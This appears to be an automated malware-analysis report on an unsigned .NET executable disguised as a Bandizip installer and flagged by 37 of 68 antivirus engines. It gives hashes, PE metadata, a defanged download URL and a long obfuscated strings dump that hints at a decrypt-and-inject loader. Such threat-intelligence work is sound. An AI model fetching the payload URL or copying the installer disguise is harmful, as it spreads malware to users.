File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 201.07 KB (205896 bytes) |
Compile time: | 2018-07-06 04:20:07 |
MD5: | 8ec65b785938717294c75c2b6a15a0ce |
SHA1: | bd430f4e5334ee12b8270fcce1383e10146b073b |
SHA256: | 8f27a8c28b32fbef7d96966ec20db16ad7d93089dfce4311cb1b44d5e7fd6f07 |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-07-09 23:09:03 |
Last submission: | 2018-07-09 23:09:03 |
Filename detected: |
- i1.exe (1) |
URL file hosting |
---|
hXXp://timmason2.com/demoami/bab/i1.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-07-07 12:10:01 | [37/68] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x30bc1 | 199680 | 8efe6552ae5d41cbb80accb6ea616ccc | 4a5acde19f0b63b477ae4b69418ea09774ab1b84 |
.rsrc | 0x34000 | 0x6f2 | 2048 | 10f7692d8684cafde553b976c324a12d | 6658856385baf648725c276522df0159f2a08362 |
.reloc | 0x36000 | 0xc | 512 | 7b845fff4bafedde077f666a233b2dcb | 1fc199394bc37b172d8d22ad1e91cb2869d0a859 |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_ICON | 0x3406c | 424 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x34250 | 20 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x342a0 | 556 | LANG_ENGLISH | SUBLANG_ENGLISH_US | |
RT_MANIFEST | 0x34508 | 490 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | Copyright(C) 2011-2016, Bandisoft.com, All rights reserved. |
Translation: | 0x0409 0x04b0 |
FileDescription: | Bandizip Setup File |
ProductVersion: | 5.13 |
FileVersion: | 5.13.0.0 |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
KERNEL32.dll | |
mscoree.dll |
IP Found | |
---|---|
6.9.0.114 |
URL(s) | |
---|---|
No URL found |
String too long |
---|
ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd},ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0=,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd} |
5Y2D5a625Y2D5pel5YWr5b6IXYXhmWEtjMXVTUHcyMkhTQ0poQVdFYTZEamhEU3BDaU9NengyV2QzckNOSWVVVnZyN1gwY0x4N2M2K3NJMlNYZQ== U2sxTjFXL2tMbFlQUzVyejJHUkZldz09<SVpSUGZNcGFFZ3lSNlpEeVhuT1lpSngwOFd6eDRaQVpXQy9QZE1uZmFtbz0=<OEU0a3lad2xRM0FKek1EVXlaVkQ0dE9TZkFReFdzbWcxbGVHL1gzdU9Rbz0=<enlZM3ZVSnJtb25CVFV1Yko5VUNDNVR6REhqNzFoWE9KM1NHcnJBS3R2VT0=<V05hdVVhaWxVaGNlV3ZOYWNYc29aWXhUU24yOHhVblhkYVpMeUFpVHR1VT0=<dzBxRXpjQ2E0TWNHOTdxRTFjZ0FDZFFscHJtRGExMTdWS1VYMWFtZ1pBbz0= cGRkM3paNWx3WHRqOGhWMUdLUmZWdz09 cXQ0dEhtVE9SWEZsdTA4YytzenAvQT09 |
Copyright(C) 2011-2016, Bandisoft.com, All rights reserved.
Version=
VarFileInfo
FileDescription
ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd},ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0=,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd}
5.13.0.0
{eec0026b-85a0-405c-8e28-9095d82b4754}
.dll
null
"*)Nb
PublicKeyToken=
FileVersion
StringFileInfo
{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}, PublicKeyToken=3e56350693f7355e
Translation
Wrong Header Signature
aspnet_wp.exe
Bandizip Setup File
VS_VERSION_INFO
040904b0
! *)+),)-).)/)0)2131415161
5.13
neutral
ProductVersion
Culture=
{0}{1}\
LegalCopyright
, Version=
, Culture=
, PublicKeyToken=
{71461f04-2faa-4bb9-a0dd-28a79101b599}
w3wp.exe
Unknown Header
@sV^\
'MoT
n EC
9| +
DateTime
M?WiIZ9
6q2v
FtXo
:AGL
1uV$D
4#<\B
$r,{
Int32
q8jf
_z*1
v__V
kMv+R
Gnwa
SuspendCount
l+GvB
fy#95 @Q
J }
3:,=
oc]E
cle6l
qa5%
TdQ
ResolveEventHandler
l@m)
K%gJ
QkJkqq
W tTo
BS6G
$AQ"~
60K
tTBTk
BkCm R'
!r#S
OXx+sAn
<\2,!9~
x[IT|K
Substring
N%0e
=F1K
wwl
o8Y;+
+"+#+((
LTKQ
QR&
f#Wb
K Lh*
=*fY
z5k<#
Version
JtL
%:4<
CEVB+
CryptoStream
zd'N
Tl5
H_i[gI
BNfT
{TLwU.
LBmdsq1
lVFf
.&\?
=.bP\
N!
+K`
}E.f
dd'r
!gA'
O$q?
@Pf%U
qZfZK)
*.^Ai
PtrToStructure
2\c'
g,.c
Marshal
}:?_
1ZT
fL];L
i2~{h
,R.i
F.A6
buc]$~
l,n
3Ab5S
y*-6
WL'Z
>.VsGX
% j3
v|-
%d{f?
m"{}
&` pd
i|~B
RuntimeFieldHandle
y4j(
aFNl
w" m$l%w8m
<CKZ
)ojIjr
Ed_%b
ky a1
45uN
)>u
-yPa|
S\*-
G gl
e%nhnH
,3&&
(bZ8\R
%|<#U}
g?V}X
EndInvoke
uorr
5{A3l-
IEnumerator
TIW@=n
b;o(%
@V>2
TBqf
/W`J
wgcsT
oUCl
5tJQ_
n.+@"f
&3v
3e6
}4xd8
\7GgfA
u CH
CO-4
Write
RTzy+
MsK
YY7)
7}"U
+rO7
B#etI
2z~_
w<u'
Mva
Hopk|8
]]1nS
wS&I
1>VjL
iIfS
0SF
7Vx
K(
T-fEO*
=iV1
A<m
jh:o
/uVf
(Z M
WF%q
bY6
;<eb
(@"
W-f:
Zk]4
Format
'xKi
30=|
B-(
#fid
(:YVMXf
BBbw
xK?|
NrQ2
g70X
#eUh
wv:RU
v~;J
*r,/8$Z
@>9J
~jHi
AppDomain
Tw6
/,)
%n.iZ
$ s[
[ g{
get_CurrentDomain
8u##
JyM\L
:4a$
$` -
E1sZi
8zXz
9XW[
Xr]W
RB3D"
X d
}>gpyfl
7)02"
: =;
x;('/
A9W&s<
#X;Ar
N-{50
aWg;
Z f
6LXA0
U d?j
FromBase64String
[FOix
0\5*
Wb Z
A?HV
DLayb
.G,I
UA~tZ
Path
qy}2
(pUc
$s&0
anu>
M|&k
5R?{}g
AEs}
laMr
=".%
%Yi<
dmGO#
Ostr^9
5HYO
(QkDX(
R\",
Oo68
-(&+
"[c+
h,,C
1 h(
7nC]
pJT
|#}R
ToUInt32
7wq
Oyl1
vMr;
rk-mt
auxvc
;e\3
Type
\P&`?
k*Gf
P }w.~
6j4
j-TFn
n5<k
isV]P
k{4B
'8: K8
B 6.
IsWebApplication
v6d>g
t%5
O,C8o
,SKj
m~|;9
rG;}
}8 6
KW'^|
4Lcm~$V
2P>8
P rX
h*>A
_B7$
InhJ-
4s5
SmartAssembly.MemoryManagement
jKP9R
get_ExecutablePath
At`
SI6
Char
EtG)V
#[ #
J /I
ProcessModule
y-5J
[1AFV
rr&Z
DJG[
=?=Mf
"u$T
h&(Z
get_Name
lGjF
iZ"@
{h{
]lo~
Q|x (
HashAlgorithm
"mk]N
= LE
G{))KU
35_H
U!E"
|(dk
j pH
cccw
.?YS
TIB
X/iB
k gA{]E
*!}>
d3 c
Z$Du
6%[O
0 CwP
'\be
BB:M
T)UW
[G(I
k\5T
<gQYr
D U|
E!]<
t-M`
m*H8YC/
2Lq;
^G,Q!
Cf F
y&tt
AGRS
8y}`
p>!
_r7{
v0[ae
?Gj
NSg4
KTrBEhH#
6 9
odS`
.text
rF;
rLR$!4
E;w G
GetString
S6 c
6kx@
GetObject
dwMilliseconds
? k\
U@f
Convert
6<?(
, \Rj
o!!:[
D&8\
g9`F
System.Configuration
H&_{
x,E
3C@f
!u9#
(K{5
15Ez
(^8
=y^}
|sI0
5~ %
SmartAssembly.Attributes
F, G
$YCx
GetFrames
uh{ B
&LUq
c" >
}qb
P"4h
HT*{
{ 6 u
StackTrace
Monitor
*Ju1:"
LKFn
8q6"
@ "}
f @/
;@.$i
f|5O
j8z+
N7G /
CreateDirectory
4|\f(
: ~f
Fl`YE
#SB=7:-
CipherMode
!IV
aA$-,
CO77
mDL}*^
jQr
ugHU
vkqI
)YfM
[-yZ
I25zZGZmZHNwIyQkJC5leGUkJCQ= clJobnBoQnVnVWlSY1ZscFZnTGZqdz09<aWp1bFVibjhEUFBrZWU4TWR2MFBmM0pQWFRNTld2WVJPUk8rSmZvUFNBVT0= Um1ISGdXWFJZY0pUYmlldmh5WlZEQT09
6y7t
GetCallingAssembly
RuntimeTypeHandle
SDdp
udpI
bPTi
"Yog
=J)0[~
(y?*l9
?ZN,
iUO*J
UONH>Nc
PvQ
%,/_
a T9
1L>F
`.rsrc
G I4
G7E*4
vH8}q
ueb!
]42W
CreateDecryptor
get_Default
@33p )
@nh@?
y*j6
3qF.la
vau<
StackFrame
kernel32.dll
:ad
LUMOo
CK+ z
$h&a
G[:i
DY1q
I5K#
hoZ&R
@S9n
w/-w,Z
^_]B
6Fv<"
n2M}PG
;6R$
uyMh
; \@
CVCVGR
BdBW
O4eh'
E^Sa
M&JiU
set_IsBackground
eUlJm
TRkG#
`=D/
$[H
{?\0
kkXa
Z6'NRx
FjCay
i1/2
l#^#
a2oB
}@7\
X* 8
|+K4hZ1
JLg PB
+Icl\a
(dNKK
PlatformID
_d}L
ul6B
`X"M
P,Dl
%z3:
- &&
f,A
-a~%
'[xL7q0R
+shN
Q5 7
(v.
5c?T
#+Lm
; \
GetProcAddress
wq6QRI&
}z8\
w?'6
5?p'
0X@ K
lUwF
_}lo
s{wc
2x,'
:~ax
GetBytes
\^5[
,/scz
hgyx
\=-$
Process
*_nJ
Rb+q)
s5Mn
_u1l
thB`
.\zn
kernel32
M<,UcC
l>EN
Pq31j
&{`z
@]5r
4p{h
: U-
u^cJ=
(r{r
$tT[s
JW}V
get_Assembly
=EIs
eT[
9]J[]
plie
~FE.
@9/k
S H
PGW,
MySettings
l3;z%
FVGg
Y&y;
< Kx
)IF}
[] yPm/
X Z)
@qe
C DtCU
BXm
;c&
+[-6
d49t
z]`>
System.IO
#zq7
WrapNonExceptionThrows
get_Now
X4_iM
4/f/
fwD`
jS~U
c1e
EYAp
`&0c
y|=P
;s}1
j0{>
9eD7hQ
Ew'$
\kU-
9il(
9{Y.-
w?qa
:m*
]PIK
ZFpc
wj<V
3<*am
pjKKN6q
AttributeUsageAttribute
BJ|'
XD a
a_Q[
|ip y
lL
\603
T[CP
5a625rKh6YKj5q+S5pa55Y675a6255qE
STAThreadAttribute
Fe~
Hr"W
VEVNUA== b0FKOVBtL1JFVnZvNVVqS0xMTnFNQT09 cUoxcng2em8wSld2NmNYZXpDeU9HUT09
&`\>",
<[ 0
mR$G
wjL64
hR
o(CO
#.z%b
/aY2
Ok&:
2Zk
aKHs
8,ao~7
d3.exe
W:(-LY
c0Tm
2 YM
j&mT
~U4`'
*Ex
uPx2
~1wp
System
EventArgs
Application
|`w7
bur8
IBf.<
3wWr
/1^
An&\(WY
LS%f?
+(~f
}_p
.(n(
bf>n0!~
e%md
M>7B
L( 8
j\rE
p;{.
] pv
<?zm~U
a#u
I!K:
L*Ta6!
no&v
;I]L
_5B2
VO=0
MethodBase
#Strings
VEhSRUFEIFJFU1VNRSBGQUlMRUQ= QUJVS29jWEEvOFU4L2RUeVFxU2d4dz09<MHI0UStLZmZSU2hPTXJKWFE1YklQQlBmczJ1ZURVUUxoRWxScHZTTk9EOD0=<RmsyZVpJTUFwd2NJV1RFbWIyY1MraHBneFA4S1RBVkZWYk00R1BUTDJiND0=<c0Jnckd0S3o0aitwWjM5Vm5pVFBQNHlQTUJONFdIVlk0SVM4Wlk0Zm1TRT0=<MmR1UGRBZXRJb0tReTV4ZTV5MHMyVyszdW5HcldPL25oRjcrVTlLdzdNST0=<UnhLVlZidEgxNHBnamRYYXcyQzFZYldVUXh5d1RGYnFmL3BaQkI1MUo1Yz0= VGdPaEF5TjlZaXFkWWlyRDNReXR1QT09
c0-P
System.Collections
{Urb
DOXP
z3;-
no`1V}
,Wf5L
W8x0dl
$y&f
*P[O
p{B3
N@(
>'F6
b5 ]
&t:q
x=1$
Environment
3r}"
=-@9)
n -Z
3b+oSbH
?b2,h|
<6!-
U65Q
HH M
E@tk
j)*O
$OQD
u`\L
&b].
OcNG
R8@%n
G7iR
7c_y`(
.$I&G[
aJ$_
oYL?
#jE
T]~pe
Uj8:
dYFbZ:OX
get_Position
System.Diagnostics
"qA
[
-V&+(~3
-H"Z
AVg8aoR'C
add_AssemblyResolve
ou+t
/&uVa
y^Ew
\PAc
OpenWrite
#D}m
,_l{
KY@<B
x{By
A|aG8o3`
( G60
21aj
A b
o2a>
u'XL
)-ZW
c$N^4
mg4}
ihs:
#CK8
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
A3!}
t4U(
>Z=>
|i~Q
/zP
tTnB_
>-Es
kMBK
X;F 4
ji<%{.!a
H5Li
Bq(dA
TryGetValue
}_Az
{k3%
sk+M>!
TR.dG
ud;A
ProjectData
nw<~
4hjD
]Y>bn9
z/NlAU}
<c3<M)
3n-5
5<PyB
Intern
MD5CryptoServiceProvider
3jQh
HrGF
74r~
Aw8R
<nIp%'
I3J1bmRsMzQzbDMyLmV4ZSM=
, '
-8=+B
>5 x
!\QM
get_UTF8
mEO\
3yHQ*
+<S0
9|>H
ContainsKey
Cr^Dd&
jLe|
(O}j
1M@m
''/TPfo
N/x
g;0y
* 8Y
M <I
J4%
N:+Y!
K|o>y
6w~B
fZ#%S
-b{(
+guh
nB)
O]8dM
RXf^KEG
c.g3
b`~c
$\%=
^QM)
(W^x
[@!(Z(
#%'"
|F !
{ ,>
IyV#
_b`}L
xKz
eMy
}fc}g
V'<<
_fM#
3z5D
F5Y|
qJ22
\ !v
_/-
+(~d
r^/Q
WiZQ%0
"m:n
>JZY
HX?=
bJ W vC|
bvI#
:3RE
#zz|592/
{z}
1yx5
Delegate
xl?mO
SB5r(
Ivt<+
AssemblyName
yz5@M,
ev9B$
0RP'ugPQP4
gom}
Ns,S
t&Y''
]Do,z
lf#t
aJX5v
r|-lS
1=EUF
f;x@
R w6
MH1{)
Go$ I
2@k(
L&o2
)l}"
z*L
Hyzqas
oz+:
gFW]tJ9
2Vfa
#GUID
GetProcessesByName
InitializeArray
+VZG
Ueb_
St8<
wPU|
]pR[
Enum
7^_S
$a-j
CopyArray
_2 Z+`
P+3}
a o=MZ
X$]?S
bX~6
@cv|5{
Uv1)
kC
Default
`6nJ
^g6
EU[i
h\h+
/muz3>xiC
get_Length
>;"\
rCR'
yRkbr
PgDi
DESCryptoServiceProvider
! ?3
\$v79
Dw>\
{"8|N
}]s2GQ
czBu
tJ~p
wd-P
3Er
CryptoStreamMode
?Q;h=E#
&+dZ
9-4
qt|H
nkE/
HU@.
3lW_
nh(UW\
B$WN
ValueType
System.CodeDom.Compiler
IT)pAi
ID+#7
SfI
_6sa
`e3Q_
6GWq 3
v<g,
"}3k
AR7(
ToLower
\&{FL
*wn
F<:_pB
n,2y:!
Jk"@n
k~0;
X}A
r-j
-C&&
[6GL
bkl^
Trim
zI||
+oem
,]+M
/ -\
uA O
4-sIE
q_A
Djb;2
-cFQ
[2Kf
ul:(
%zh}*
%(pmZX
+$S!
;bYw
(LOod
EaW=
a pv
nEB!]
4S|(
JS{q
rtYZ
w3R~X4
PKFpK
|LBf%
i#$,
`moNj
)Z&;
n_#a(
1SvcF
. u
ToInt32
[4so
! eI
StartsWith
NWcrQnhGSFhrZFRjRU0zY0VHZ2swQT09<c3NjcFJaVFNwdXVnRGdPdm1hUFBQdTZiL1g5Z1pSWWVLY3lhdndaM1dQTT0=<OTIzbFlvQWhiMnZWWElNNnUzTUN6akt1Z1ZEQlhaTWNiYjZUaGJzTDVyOD0=
.B#[*#R
x}W1
R3rUoS
}|8_
nD 5
ToString
Vd{|
'tS}
9Ipu
Utils
v+ +
5xOW
mY6v
."d9
/F0M
oC_
Yt`FH
~K-iT
vJK_
i/,S(
e.5g
q0S#r1
hUm)8
HC 4)
y.s=
ClearProjectError
mBTG
{eec0026b-85a0-405c-8e28-9095d82b4754}
LRNst
Split
&"]NH
?PP
#pWK
a?,Vc
ZRo*
@0]U3
a.e`
ZG>0
*.'fU[
V$k
X?~f
#U)f
ICryptoTransform
^D<N
, }i
?dQ6
add_ResourceResolve
V C
NaI?
Dqt
>4@T~
`cK}2
25%zlF
h8G*EY
T-e
^[++
10.0.0.0
d7{Z
[=C7
4:ldU
dQzp
Gx_x
^EZ+
System.Security.Cryptography
&=Um
j^'S
IQw<
MemberInfo
{ Hi
aYz>H
SettingsBase
d|;(
Start
,lha
T,Xj
*Ps
h-5A
R<(H[
7T2:o
yH^Q;
7a(
&K"8
5Y2D5a625Y2D5pel5YWr5b6IXYXhmWEtjMXVTUHcyMkhTQ0poQVdFYTZEamhEU3BDaU9NengyV2QzckNOSWVVVnZyN1gwY0x4N2M2K3NJMlNYZQ== U2sxTjFXL2tMbFlQUzVyejJHUkZldz09<SVpSUGZNcGFFZ3lSNlpEeVhuT1lpSngwOFd6eDRaQVpXQy9QZE1uZmFtbz0=<OEU0a3lad2xRM0FKek1EVXlaVkQ0dE9TZkFReFdzbWcxbGVHL1gzdU9Rbz0=<enlZM3ZVSnJtb25CVFV1Yko5VUNDNVR6REhqNzFoWE9KM1NHcnJBS3R2VT0=<V05hdVVhaWxVaGNlV3ZOYWNYc29aWXhUU24yOHhVblhkYVpMeUFpVHR1VT0=<dzBxRXpjQ2E0TWNHOTdxRTFjZ0FDZFFscHJtRGExMTdWS1VYMWFtZ1pBbz0= cGRkM3paNWx3WHRqOGhWMUdLUmZWdz09 cXQ0dEhtVE9SWEZsdTA4YytzenAvQT09
"o9
Ux{I
(J
z`Ua0E
1o"v
j()1
BitConverter
`Mj?
PV]
:6Q'D
2:<`
?4}g
ToBase64String
::y^
<*F
](:
hm(g
|l%d
@^N7&L'
AB<.R
.ctor
JdcP
=[?cE
Jju
* 8)
mfuB
yFn/+DR
fnf||
=} 6
s~#j
J W
j($9
T;JI
lgyg
$O1
HBS
f9&WX
+BFt
~6_0
]`yr
K;x=
* 8
Invoke
C8`u
DI24
XxmE
q,O[
vzH9
,;d'?
07T%
^"`qH
4rI
~7/T
p>q<
` }|
=$2kH
(%qg.
qFUb
`aBWC"
#fsT8L:n
g)^B:i
\y(+
t;1'
Module
* 8X
F-TX
7AEk!F
ie0O
GetManifestResourceNames
+.~d
Array
,?jj
;3,cJ
* 8W
~O$6
rJ#6{
@.reloc
GetPublicKey
DnzB
C)x54cBh
XKKvU
534LH
<L<f
l~ (
kryT.s
IaiH7
~VYu
/ &~
k8_ra
t9.$
B+*69J
J$4<
Byte
get_Chars
$`x-
s[eG
97B
uk?Hd
uK~A
qi
MoveNext
Dr9A
)gkt
|@:8
j~>j6D
2&aN
$"N:
~@q
o =(
5V| %
9L!a3
#.A\
VlBFWCBSRVBST1RFQ1QgRkFJTEVE
-e94
Toed+J
v3g
Ne=NM
_%OX
*aU'
y$@<
kn3?
thN
f+&E
pS
A/5_
|7Gd
2pc&
1Ix4
H:b[
_ )(7q
g`2
#AY}
&/(
~Z[k
PKy6/
P`Z',
F`xk
KC%Wxi@
hb{pm9'
BD"D
rCd(s
JJD\Aa
JUL8mD
MBfl
u:z'
:b?S9
5gIZ
t%}s
OL??
c,@,<s
# hB
=^UThf
("0s
;wZ+R
yKSbR}mi
sKHm
FreeHGlobal
&p{}
;&lh
b>$,e
yZ,hdI
/ #@A
u.[{
{P60.e
;}DO
OqK5
PJbix4'8
pz# N
%dL
get_Item
SI]c
-f_p
}eb:
5piO6LS15ZOl6Zu25b6I5YWz
& 2H
`q\g
FileStream
hK8tP
Directory
KNTZ
C"1M
:4hl
}J%)
,2sy
_8jQ#3
ZPr#
7/9S
Assembly
xCrXa
J=sb
DelegateAsyncState
T436
AM/B|
InswfSI=
N/Rn
> #h
ovV1
G $A
q-Mc
:z^&
;q!b
{.lY
<J/p%
- ~7
&l.c-
XUig
X$}`Xr
#jrT
Exists
f5~.
v)y`
&fkYTi
gla
|;\e
6M:/.
BaFfO
Ox9]P
$ymlv
lpDebugEvent
Z^<f
C8)%,
5>Tg
`nHh
* 8W
M8>>
I{RwH
Ca66
'S#aNw
8WY2
/4oR
Co`+ s
#bQ=
J"bn
!Wh
]S$W
(7Q\
3<XP3t$*
~Q8P>u
p?nZ
@k))L
~z} m
Bl"?y
\"?Y
}%Ic
/Pt6
`<7
-)&&
3U$l
&}I
\bH:&
+h K^jz
hG9T-Z
ah8<
TwEj
81
pCoB
0REJ
X +
q%Ge
>&/%
get_BaseAddress
G= M
GpEOI
/vI,(
,Q&+
=.'-N
4_7
#Blob
Fy4xN
|eB%'
B~p^iA
%O" /
CPTQ
96ta
(g 8H
mTvt
ResourceManager
RuntimeCompatibilityAttribute
e?xt
ls9z
GetExecutingAssembly
~2=b
A{/=n
6;%
kD%W
ay}%
+LA;d
$yRo'
*hWd
tKMT
$&o\
=[ Li
^;7j
vHCc
hI#z
v?$5dY
O*'HS
ZQ;+
uJ11
ToInt16
SetProcessWorkingSetSize
( OcU
qX8\eL
hSs~
zgOq=~:
ReadByte
ml"r/O6G
n@jF
;`[K
]|"
PW4
CreateProjectError
k)J,
-=5R
Interaction
|_%F
?|}3
I(QOD
*..+UD
1z@d
GJm}'S=
9H[xZ
>T<
*.sx
2e 4
R(Xl_K\
)L^
AllocHGlobal
=6G"
"@cd+k~s
&N<4
|sz?
?`Ig
`0IS
yW#?
366%8t +
>#}e
WJD$
zTe7
p@!o
XUV
?2,Z
Empty
O];
/[p:
Operators
arem
XN}{
'O{H
!|v?H
G58Uh
xc7:
ps`]
]7l$
{o*gg
M{[a
d,T;@p
0Ogd
#=z
% *L
IA==
yTaq
H/A
xm@UH
IndexOf
{ D=
X9Je
B| ]
(La'X
Y1{
w7_
ngKV
#UU<o
%}@^
SetProjectError
&o9Ov
J<5V5
xS=PrY
~tXQ
>j,w
':Q8
d7~M
ypj~
o%lm:
y' 2
"Powered by SmartAssembly 6.9.0.114
y8=_
q8Ko
4|yY
abj `ew
O*Y;
ICZ{LLB
Read
b`bnV
-f#.
B x}
C-9`
>%rU
L!'uV
7S,!S
_^eZ'
A.Z
Y`&
[W2[
JXj|x
value__
y|E@
6Y:
XA==
s 5s0
hX&D
:NX'Y
Yj @
Iq0JL
-w& (
wpgb
vmp|
nG <2k
tM,)*
jl\Z#_
EPp8
Rl_
u.K>*zc
/Y2-
Dt<=
;amfQ
d0,c
9xE
p6<;
^"]v
U/W (
.9oC ^
7~Pw2h
.cctor
+@eZZ
AsyncCallback
#LU8n
B4
mscorlib
,Ay
Jx!
Z!K*
) k^
@9sH
_}q2
A6G
GetMethod
'jYX
k%({1
\CGP
%HE@
GetObjectValue
$B}x
{L6"
`tc%
CU`@C
$]yL}
W>.E
,34
rDcI
Kill
NWGc
lkqF+
(Cp
}$*@
&cE&
|D`YrMkR
5So.
3x)X
Z-V6
p,C>D
xaMR
_&eKv
wE-t
6`o&
L0 }
~8"5
Ko@
ReadOnlyCollectionBase
._0H
)g~_B
System.Reflection
#E7:
w8 v
<1pP
1S[e
p+'w
iGA(
T@7z
MoveFileEx
,>&&
Xx .X
%vrWSM
5?P
U1S43I
2"#>
G[-[
$;b}
>WniN/]
Qis]
1]6,8
^`Xe
SiX+
k%lb;J
t;-P
odmUWoR
O8hV\
,%pX
*,4i%
'U!)
^95
iD=pg
TME2
RSA1
Append
,}P$
$Qv8b
Rfc2898DeriveBytes
\OBs
op_Equality
9: G
5Zgi
]V7
+:
^8o{
SNoiF
7!]x
, Zf
/ an
BKY
Delete
u3GK
`.%&
@WTNc
w l~
t8CS
\0kR
0:,@F
15OZ
:]Uqz[AQ
h-kI
A<
{0v+.
{Z@2[gA
L4a
oGvx
/@Cn
JsS?
+y$wP
,PYX-
)!- RK9
EndApp
@;f|{
/r,5
D[H9
bE8%[
'FX,j
kTX7
ju#$
YJ\>
Ln.{T
."_s!
e5Nt
laFN
w,O
fD2H
O'Lh
ZE%)k
u`S/-
+9+>+C+(
C Gu
h<V)
Environ
Y2ZmZmZmZmZmZmZmZmZmZmZmZg==
xqBH
G<9
,
& Xx
nR,CU
&C!0
U_L%
@vZ
XtLK
MhKYn
mscoree.dll
!This program cannot be run in DOS mode. $
DelegateCallback
<rB\?
File
z>E"
U&:Kzl
#]GoXJ
&o?!L
(gY
*vOE
Z8Ah
Dispose
=]M
Dv\D
9xDk
[&[F
GetCurrentProcess
Y//d
efnp
vkyR
dX++Dy
gLr9
J]ZE
8b(B_
;J&bPR
+I!+B4-
6$B4
gU%
SHnv
8=uP
M>/a/
z8v#RY
91>p
{a8f28d60-e785-4aa9-a754-e1c776a2e7cd}
.D-0K
HsZY?
QX(\
|x!.
rv*H/
&H m?
PoweredByAttribute
N\Y122]E8
=jz1`7
m/+8
hara
S!&m?
Id q
jPAt
KXC(
f N;K
Os$*#
HX')
BSJB
{/AZ?
+G76
get_MainModule
\} p
Y~\f
e*2Muy
MU$}
88|JL
ZnNmc2Rmc2Rmc2Rmc2Rm
] ;b
op_Inequality
GetManifestResourceStream
sx9!G>
2wme
Ij&Ox
O >Q
LoadFile
]iEx!Rl/
IntPtr
M%h-
2 2H$a2
-Eg:%
iZQ'
bYUG
ProcessModuleCollection
d5;H-W
6s]1
BuNY 6~%m-
oPs3]
+^<
QM<]
QfAVh
Zp(g
ebc6/x
0M Vmv
QiBOK:
Bf8[uF
2 q!J
7p u
7^U@
UG473}
!k4}cM D^
!RG@
InvalidOperationException
CDb7
Z*GO
L QD
RijndaelManaged
=*=Jyx
. O
h;[i
/hW1
Jo)
=pGW
*pZh
ee,~
o -<
?ra? =
/ueS
SwE1
.G>3P
BlockCopy
yn[z
:_d"
C^@
JvnA
E n%
{8y^cE:]
*QE(fi
4ti8
7V\]
r$]|
SizeOf
Yj_i* +
}Q8
wS8(
|:!h;
Luo(W
9[Y.
`qXAhH
hL*^
aGp$
uq+&
MemoryManager
|y
Io|)
~f\
$Qj;#`
#B\uK4Dtu
&&&&&
px>Y8
G Ke
@{?0
:zO=
c%,$b&
6yw'
Yjk ?u
=d&?J
GY]JL
>TiA
s[9T
Boolean
&+$~d
4;ii
6_n0
iDozS
IL2"
?Df
wK.#
`-Y%
s}5+
~=N
]V{sT{
A#$ ;S
*0
H$Y=xw
J~,u
MemoryStream
ym,I
ResolveEventArgs
]6Bs
meis
u@R5
6tdS
#HaA<_
|$I
ZsbS
&{~B
'uvzf
Bjn{}
%OJ
$~YVw
<aL31
*8J
S<26
TvCLwH[Nh
U<8va
LmV4ZQ==
6!.T
f5
$sNy
>ia$
*8d
n6p%
&P]
&JxE
GA p
*8t
Zsp-
{}|Q1
U;TL
Microsoft.VisualBasic
^DkQ
hj9n
inr
w%%h^
$JvX
mn)l
)e,p
.-Wz
osSf
u1"tYl
ThreadStart
S.L
>Cy#
7|XR
S(yBb
ES<
;~R!
*83
-"vd(]
~ZF4Q
|3w+
DLD H0
or)'wO^
[m:8
Et^
>/XwY
mX:S
VlBFWCBGSVJTVCBGQUlMRUQ=
258\
_vE:
vO-':
Sk-
get_Handle
,i0Z
O-B3D 2
Concat
_6tIQ0 ._
StringBuilder
+*f;
bmlh
9M>/
,V&&
.|-^
,V&+
w9S1
/Sq&
Z8tl
.Ci
VlBFWCBGSVJTVCBGQUlMRUQy
Y>Y fQt
Q9C"
o=$5M
}_no
lNFer#K
aE xL
"bya
g_A=>
n2j~
CompilerGeneratedAttribute
K:]a
1~#-
`MS't`
WfWu
,&*(^
6@!7I3,
^cy,zH
ubf+
+'~D
n"MCTa
8}0
`X]w
aOg^
UXLI`
e=lsD
Z,Z
Copy
6dQq
! #{
w| ;
AssemblyFileVersionAttribute
aM&CT
o*D}
.ZtN
GetTempPath
System.Text
GetName
TZpz
/V,d7 s
\oJHD\
;z\)
4i&2
System.Resources
)y"y
$<S!a
Jy,
v6Ju>
5!:]i
8$_H
(o2`
>g6>W
3 s]
GKtD
Z4I|
KUxx
YM\6
)$WO
}bLE
X .v
mavk
0L@\
D4u:
K+=&
?+e
Hs<'8+
Qu2
~4`"
wu1Xs"
j.t
y\Rh
w d/w
!lit
9$&
A ah
G1tB
\'[*X
| mEW
DelegateAsyncResult
GT2t&#
